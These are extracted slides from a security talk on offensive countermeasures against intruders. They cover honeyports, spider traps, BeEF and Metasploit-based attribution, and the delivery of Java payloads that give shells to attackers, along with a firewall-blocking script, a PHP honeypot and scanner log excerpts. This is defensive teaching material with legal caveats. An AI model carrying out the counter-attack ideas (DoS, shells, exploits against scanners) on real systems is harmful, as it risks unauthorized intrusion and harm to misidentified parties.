1. Bringing Sexy Back:
Defensive Measures That Actually Work
Paul Asadoorian (paul@pauldotcom.com)
John Strand (john@pauldotcom.com)
http://pauldotcom.com
11. Outline
• # whoami
• Introduc-on ‐ OODA, Don’t run away
• Case Studies ‐ Reasons why we CAN do this
• Warning banners ‐ Allows you to do things you disclose
• Annoyance ‐ Mr. Clippy, User Agent, Spider Traps
• A9ribu-on ‐ BeEF, Metasploit Decloak
• A9ack ‐ SET, Java payloads, purple ASCII art
h"p://pauldotcom.com 11
13. Disclaimer
The contents of this presentation may get you into
trouble. In fact, conventional wisdom stipulates
that everything we are going to discuss is a “bad
idea.” Make sure you vet any tactics in this
presentation by your legal team and upper
management first.
Any action you take from this presentation should
be documented in writing before implementing.
h"p://pauldotcom.com 13
15. Successful Penetra-on Tests
• Most organizaOons provide easy
access to their “intellectual
property”
• How many pen tests have you been
on?
• How many of those were successful?
• Or?
• How many women have you dated?
• How many have you slept with?
h"p://pauldotcom.com 15
21. John & Paul Then Thought
• We can do be"er
• What if we were to defend
systems, applying what we know
about a"acks?
• For so long we’ve gone down the
beaten path that we call
“security”
• Its Ome to break the mold We also thought about how
messy we get when ea-ng
noodles, but someone beat
us to the solu-on...
h"p://pauldotcom.com 21
22. Why Use Offensive Counter Measures?
• There are Omes where you will be required to do “more”
• In parOcular when working with law enforcement
• The a"ackers are ge^ng more and more brazen
• Very li"le perceived risk on their part
• We have rules, they don’t follow rules
• You may need to figure out what an a"acker is aber or
gather informaOon about them
• e.g. If they are a"acking from a bot‐net or through TOR
h"p://pauldotcom.com 22
23. OODA
• Whomever can do these things the fastest
lives:
• Observe
• Orient
• Decide
John Boyd
• Act
• Originally developed for fighter‐pilots
• With current security models how many
can you impact?
• Works both ways, Dis‐Orient a"ackers!
Paul, “figh-ng”
h"p://pauldotcom.com 23
25. Case Study: Consent to University Network Terms
• Sysadmin hacks into threatening machine
• Gathered evidence used against student using temp/temp creds
• Student’s consent to university terms jusOfies sysadmin
• U.S. v. Heckenkamp
• Kevin Poulsen, “Court Okays Counter‐Hack of eBay Hacker's
Computer,” Threat Level, April 6, 2007,
• h"p://blog.wired.com/27bstroke6/2007/04/court_okays_cou.html
“A federal appeals court just shot down an a4empt by confessed superhacker
Jerome Heckenkamp to overturn his computer crime convic=ons, which were
an end result of informa=on provided by a university sysadmin who broke into
Heckenkamp’s computer to gather evidence.”
h"p://pauldotcom.com 25
27. Case Study: MSFT Court Order – Botnet
• Civil lawsuit 2010
• Court issues order to suspend the domains associated with
the Waledac botnet
• MSFT takes “other technical measures” to degrade the
botnet
• www.google.com/buzz/benwright214/PcJTmLbEwit/Cyber‐Defense‐
Law‐Botnet‐Computer‐Crime‐Lawsuit
“No=ce that MicrosoF is not doing this in the dark. It is working
through our open public court system, so that MicrosoF is
transparent and accountable and all can see what is happening
and evaluate it.”
h"p://pauldotcom.com 27
28. Case Study: DOJ Takes Over 2 Million
Node Botnet
• A judge gave permission to FBI and U.S. Marshals
to setup servers to stop the Coreflood botnet
• They were also given permission to “to send
commands to infected computers that stops the
Coreflood virus”
• They seized 5 servers and 29 domain names
• DOJ now owns 2.5 million computers on the
Internet, and will essenOally tell the malware to
self‐destruct
• What, this isn’t sexy enough for you?
h"p://pauldotcom.com 28
29. Lets Pretend I’m a Lawyer
• I’m advising you to:
• Discuss
• Document
• Plan
• Consult with others, reveal your plans!
• Hiding intenOons means you think what
you are doing is "wrong”
• Rule of thumb: Don’t be evil Note: We love the EFF
(eff.org go donate!)
• While it can seem like a lot of fun, it can get you
in big trouble
h"p://pauldotcom.com 29
30. Okay, Lets Stop Pretending
• Could this get you into trouble?
• Possibly. There is s-ll some debate on how to do it properly
• There are a few things we can avoid to keep us from
ge^ng in trouble
• Don’t ever put malware where it is publicly accessible
• Don’t make it to easy to get to
• Use Warning Banners...
h"p://pauldotcom.com 30
33. Example: Eric Needed a Warning Banner
• What does a kitchen knife, a crutch, and ductape have to
do with anything?
• It is illegal to set up lethal traps for trespassers
• However, if you tell them there may be evil things on your
network/property you warned them
"super went to open the door, felt resistance and found the
rigged contrap-on"‐‐ a big knife duct‐taped to a crutch,
which was installed with an elas-c cord. The super was not
injured.
Eric Stetz was arrested and charged with reckless
endangerment for a vicious‐looking booby trap.
h"p://gothamist.com/2008/04/06/homemade_booby.php
h"p://pauldotcom.com 33
34. WARNING: There is a knife
duct taped to a crutch
attached to an elastic
band. Enter at your own
risk!
Would this have kept Eric Stetz out of trouble?
36. Reality Check: Don’t Be Stupid (like Eric)
• How could this go wrong for you?
• Dumb moves (like knife crutches)
• Easily accessible malware (e.g. traps)
• Full a"acks of a"acker IP addresses
• Purposely damaging systems
• Persistent long‐term access to bad guys
• We have smarter opOons to work with
1. Annoyance
2. A9ribu-on
3. A9ack
h"p://pauldotcom.com 36
38. Annoyance: HoneyPorts
• Forces a"ackers to make a full connecOon to
avoid spoofing piralls
• A"ackers and testers hate this……..
@echo offfor /L %%i in (1,1,1) do @for /f
"tokens=3" %%j in ('netstat -nao ^| find ^":
3333^"') do@for /f "tokens=1 delims=:" %%k in
("%%j") do netsh advfirewall firewall add
rulename="WTF" dir=in remoteip=%%k
localport=any protocol=TCP action=block
If a machine makes a full TCP conne-on to port 3333, a
firewall rule is added to block the source IP address
h"p://pauldotcom.com 38
40. Annoyance: Mr. Clippy
• Through PHPIDS we can make
a"acking a website “interesOng”
• First, install PHPIDS
• PHPIDS has clipping threshholds
• Then create a rule to all a"ackers to
pull up Mr. Clippy
h"p://pauldotcom.com 40
42. Annoyance: Filter User‐Agent Strings
• Filter the User‐Agents in use by a"ackers and testers:
• Nikto, AcuneOx, “IamHackingYou”
• Sites do not lock down the mobile version of web site
• There has been a lot of research in this area by Chris John Riley
• E.g Using the iPhone User‐Agent revels mobile version of site
• Some people don’t secure the mobile version
• What if you present traps or DoS condiOons based on User‐
Agent?
h"p://pauldotcom.com 42
43. Annoyance: Messing with A9ackers Heads
<?php
$ip = getenv(REMOTE_ADDR);
$useragent = getenv(HTTP_USER_AGENT);
$to = "yournonproductionemail@example.com";
$subject = "Robots honeypot from " . $ip;
$body = "User at " . $ip . " tripped robots honeypot.nUser-Agent was:
" . $useragent;
mail($to, $subject, $body);
echo("<html><h1>Congratulations, you found the secret page. Now email
" . $to . " to avoid being blacklisted.</h1></html>");
echo("Your IP address is: " . $ip . "n");
echo("Your User Agent is: " . $useragent . "n");
?>
Credit Josh Wright: h9p://mail.pauldotcom.com/pipermail/pauldotcom/2009‐February/
000713.html
h"p://pauldotcom.com 43
44. Annoyance: Messing with A9ackers Heads
This all happened in
the same day!
Fun part is we get to
make things up as to
why this
happened...
h"p://pauldotcom.com 44
45. Annoyance: Evil Web Servers
• Many testers and a"ackers use automated crawling
• This helps idenOfy pages and possible inserOon points for their
a"acks
•If they say they don’t, they are probably lying
• *Maybe* there is a way to a"ack the tools
• Se^ng up a DoS condiOon for their automated scanner
• Note: This is not something you want to try on an external
webserver that you want to have crawled by Google
• Configure robots.txt to point to resources you control
• NOT something you put in your index.php page!
h"p://pauldotcom.com 45
46. Exploi-ng Exis-ng Vulnerabili-es
• AccuneOx DoS in Sniffer Component
• h"p://www.symantec.com/business/security_response/
a"acksignatures/detail.jsp?asid=23507
• Webinspect Crashes Loading Reports
• h"p://seclists.org/educause/2009/q3/526 “We can run the scans but if you
select a report that has cri=cal vulnerabili=es in it the report generator
crashes with invalid characters.”
• AppScan VulnerabiliOes
• SSL: h"ps://www‐304.ibm.com/support/docview.wss?uid=swg1PM24290
• Login Recording: h"ps://www‐304.ibm.com/support/docview.wss?
uid=swg1PM04998
h"p://pauldotcom.com 46
49. SpiderTrap & WebLabyrinth
• Spidertrap: Small Python script to trap web spiders
• Ben Jackson created a PHP version called WebLabyrinth
• It is PHP so you can load it in your web infrastructure
• Has a number of cool features
• Gently tells Googlebot to go away
• Random HTTP codes
• *NEW* Database Support
• *NEW* AlerOng with IDS‐style rules
• David Bowie Approved
h"p://pauldotcom.com 49
56. Helps the Internet Be a Be9er Place?
• Turns out “ZmEu” is a popular string for the user agent to
contain for bots looking for insecure web applicaOons
• If the automated bots waste Ome in my labyrinth, thats
less Ome they spend a"acking other sites
• Its also less Ome they spend on my own site trying lame
a"acks, that likely would not work anyway
• My “traps” should also spring on some of the following
requests as well:
[client 209.190.23.66] File does not exist: /var/lib/mediawiki/phpmyadmin
[client 209.190.23.66] File does not exist: /var/lib/mediawiki/phpMyAdmin
[client 209.190.23.66] File does not exist: /var/lib/mediawiki/dbadmin
[client 209.190.23.66] File does not exist: /var/lib/mediawiki/myadmin
[client 209.190.23.66] File does not exist: /var/lib/mediawiki/MyAdmin
h"p://pauldotcom.com 56
57. Laughing at me or laughing at them?
• Nice to see a"ackers are smiling at me, or not
• MulOple a"empts from different IPs across mulOple
servers
• About “anO‐sec”:
The Anti Security Movement (also written as antisec and anti-sec or
antii-sec) is a popular[citation needed]movement opposed to the
computer security industry. It attempts to censor the publication of
information relating to but not limited to: software vulnerabilities,
exploits, exploitation techniques, hacking tools, attacking public outlets
and distribution points of that information.
[client 68.178.200.178] File does not exist: /var/lib/mediawiki/
w00tw00t.at.blackhats.romanian.anti-sec:)
65.18.168.136 - - [04/Mar/2011:19:53:13 +0000] "GET /
w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
72.167.165.90 - - [21/Feb/2011:10:56:01 +0000] "GET /
w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
89.108.119.29 - - [06/Feb/2011:02:01:52 +0000] "GET /
w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
h"p://pauldotcom.com 57
59. Protec-ng Your Intellectual Property
• “Callbacks” ‐ Similar to Sobware updates
• Sends informaOon back to home base about system
• IP address, hardware and sobware configuraOons
• Microsob Genuine Advantage, crash dumps
• Tracking sobware in phones
• Just look at Android... Does “checkers” really need access to my
contact list and call history?
• We are not necessary talking about “hacking” per se
• We are talking about ge^ng a"ribuOon
h"p://pauldotcom.com 59
61. Word Web‐Bugs
• Feature built into exploit frameworks for penetraOon tesOng
• This tacOc works great at tracking intellectual property
• Not all ways of a"ribuOon need result in shell access
• Far less likely to crash a system
• Embed this code in a spreadsheet called SSN.xls and watch how fast an
a"acker runs the macros
• Callback should go to a closely monitored system
This is like Spy Stuff,
like James Bond...
“Ohhhhhh James...” See, Defense IS Sexy!
Eh?
h"p://pauldotcom.com 61
70. BeEF Modules
• The issue is deciding how far to go
• Do you cross the line between info gathering
and a"acking the a"acker(s) system?
• You can do that with BeEF, not saying that you
should, but you can if you have permission
• Cross the line: Many built‐in modules
• Metasploit integraOon: Browser Autopwn,
SMB Challenge Theb, etc.
• DoS may be okay, and this seems like a good
place to build a DoS for your favorite, or not to
favorite, hacking tool
• Example: Find an exploit for Nikto and put it
into BeEF
h"p://pauldotcom.com 70
71. BeEF Modules (2)
Send them to your compe--on
Who are they really?
How are they hiding?
Who else have they hacked?
h"p://pauldotcom.com 71
72. A9ribu-on: Decloak
• From the Metsploit project
• More informaOon h"p://decloak.net/
• Great place to redirect users from
robots.txt
• Many a"ackers and penetraOon testers
will use proxies and/or Tor to hide their
IP address
• Decloak can reveal the real IP address
of the scanner
“This tool demonstrates a system for iden=fying the real IP address of
a web user, regardless of proxy seOngs, using a combina=on of client‐
side technologies and custom services.”
h"p://pauldotcom.com 72
81. Gotchas
• Make sure SSID has access to nothing or just more
honeypots
• Tough one: Prevent real users from connecOng to it
• Tougher one: Make a"ackers think its a real SSID &
network
• Danger: Make sure your BEeF server is not a jumping off
point
Pwning yourself is not fun
h"p://pauldotcom.com 81
82. Wireless: More Thoughts
• Send wireless driver exploits on the network, triggered by
some event
• Easily will backfire...
• Answer to clients probing for non‐producOon networks,
send them to a page that tells them they are mis‐
configured (beat the a"ackers to it)
• May really piss off users
• Bluetooth Canary ‐ Leave Bluetooth phone with OBEX
enabled
• Have address book with numbers that all route to you
h"p://pauldotcom.com 82
84. A9ack: Java Payload
• If we can get an a"acker to load a Java payload, why not
give them something interesOng, like a Metaploit payload?
• Java payloads are awesome for penetraOon testers, no
vulnerabiliOes required!
• They can also be useful for a"ackers...
Just for @beaker
and @a9ri-on
h"p://pauldotcom.com 84
85. Evil Java Applica-on
• Embed a malicious Java ApplicaOon in a non‐producOon
web server
• Usually in a directory that is noindex and/or nofollow in robots.txt
• The a"acker/vicOm will get a pop‐up asking if they want to
open the Java applicaOon
• They will, a"ackers tend to be very curious
• The payload can be flexible (Shell, Rootkit, VNC)
• You can automaOcally run enumeraOon scripts when the
a"acker/vicOm runs the applicaOon
h"p://pauldotcom.com 85
86. Browsing to Your Site
h"p://[Your Linux IP]
Everyone Clicks “Run”
h"p://pauldotcom.com 86
96. Precau-ons and Usage
• Put this on the inside of the network
• Careful an a"acker doesn’t redirect your users
• Make sure no one can take over your Metasploit instance
• Don’t have to do any thing with the shell
• You can autorun certain non‐damaging commands
• ping your system
h"p://pauldotcom.com 96
